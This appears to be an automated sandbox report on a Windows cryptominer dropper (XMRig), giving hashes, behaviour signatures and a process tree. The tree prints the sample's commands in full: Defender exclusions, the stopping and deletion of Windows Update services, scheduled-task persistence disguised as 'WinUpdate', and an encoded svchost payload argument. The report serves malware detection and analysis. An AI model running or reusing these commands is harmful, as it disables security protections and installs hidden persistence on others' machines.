Analysis
-
max time kernel
153s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
-
submitted
15-01-2023 10:35
General
-
Target
tmp.exe
-
Size
3.2MB
-
MD5
031b4e1936f8758b15a7a26045162e3a
-
SHA1
5de003a965dde33ca504abc1d4f524e5a285b328
-
SHA256
4718af9354fd4c3f45bcd3ac66cf3e66f90004a9703dfc757690cbd669773aad
-
SHA512
2b99a219704c7bfcc21e0831c691d482230daa0781705ae1b2fa7c7410a3bb63797f69d0efe64c6edd55de2e5f7c876c72fc3ca76ad369db11b59498c1fbb394
-
SSDEEP
98304:5C7tc/q94MEjFFbK2gD4iyA9GZ5aICRdbw+a:pDMKbAExeIWbha
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
-
UAC bypass 3 TTPs 3 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
-
XMRig Miner payload 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Obfuscated with Agile.Net obfuscator 6 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 8 IoCs
Detects Themida, an advanced Windows software protection system.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 51 IoCs
-
System policy modification 1 TTPs 10 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\tmp999F.tmp6qphtob5vjtm.exe"C:\Users\Admin\AppData\Local\Temp\tmp999F.tmp6qphtob5vjtm.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\tmp99A0.tmp8fqnwwfient.exe"C:\Users\Admin\AppData\Local\Temp\tmp99A0.tmp8fqnwwfient.exe"3⤵
- UAC bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 16324⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#byzbjm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WinUpdate' /tr '''C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WinUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinUpdate" /t REG_SZ /f /d 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fkljgvh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WinUpdate" } Else { "C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn WinUpdate3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#byzbjm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WinUpdate' /tr '''C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WinUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinUpdate" /t REG_SZ /f /d 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe nborjfiolo2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe dilrjejrohmoylhd 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2⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4224 -ip 42241⤵
-
C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe"C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exeFilesize
5.3MB
MD589dc80d1824381e16f776f2d9fbe1e76
SHA1516abb8357a7af10794e483425503462b7c0f2ca
SHA256a10bdfb273bdf739ba824fb3675479c711c21b7361dcf3a305506f2a36b71145
SHA512651835d70194c6dae22ad25426b978e26eb2e8922b527f7b1b647c794a5e42548df8e37487e66d3d2994e918c0282fc466231a3c4e7fe2b95754b93040fd3e35
-
C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exeFilesize
5.3MB
MD589dc80d1824381e16f776f2d9fbe1e76
SHA1516abb8357a7af10794e483425503462b7c0f2ca
SHA256a10bdfb273bdf739ba824fb3675479c711c21b7361dcf3a305506f2a36b71145
SHA512651835d70194c6dae22ad25426b978e26eb2e8922b527f7b1b647c794a5e42548df8e37487e66d3d2994e918c0282fc466231a3c4e7fe2b95754b93040fd3e35
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5f7af91516561757ce2334224373083c6
SHA1b850ee37d868861caf32b9dfddcdeb0e5de63bce
SHA256697cfcb7c2163a0bde768e1e0ba2069582202e962bb16e6499c637567e1e6308
SHA5124bf2dcae51c6810a97a81ed0d33e2b9b2de7bccc12c16223428440b86e9bed187ddf91a5db23f76e635b7e510b90a35eecad16029afffb904a3fc58c7e494e9c
-
C:\Users\Admin\AppData\Local\Temp\tmp999F.tmp6qphtob5vjtm.exeFilesize
5.3MB
MD589dc80d1824381e16f776f2d9fbe1e76
SHA1516abb8357a7af10794e483425503462b7c0f2ca
SHA256a10bdfb273bdf739ba824fb3675479c711c21b7361dcf3a305506f2a36b71145
SHA512651835d70194c6dae22ad25426b978e26eb2e8922b527f7b1b647c794a5e42548df8e37487e66d3d2994e918c0282fc466231a3c4e7fe2b95754b93040fd3e35
-
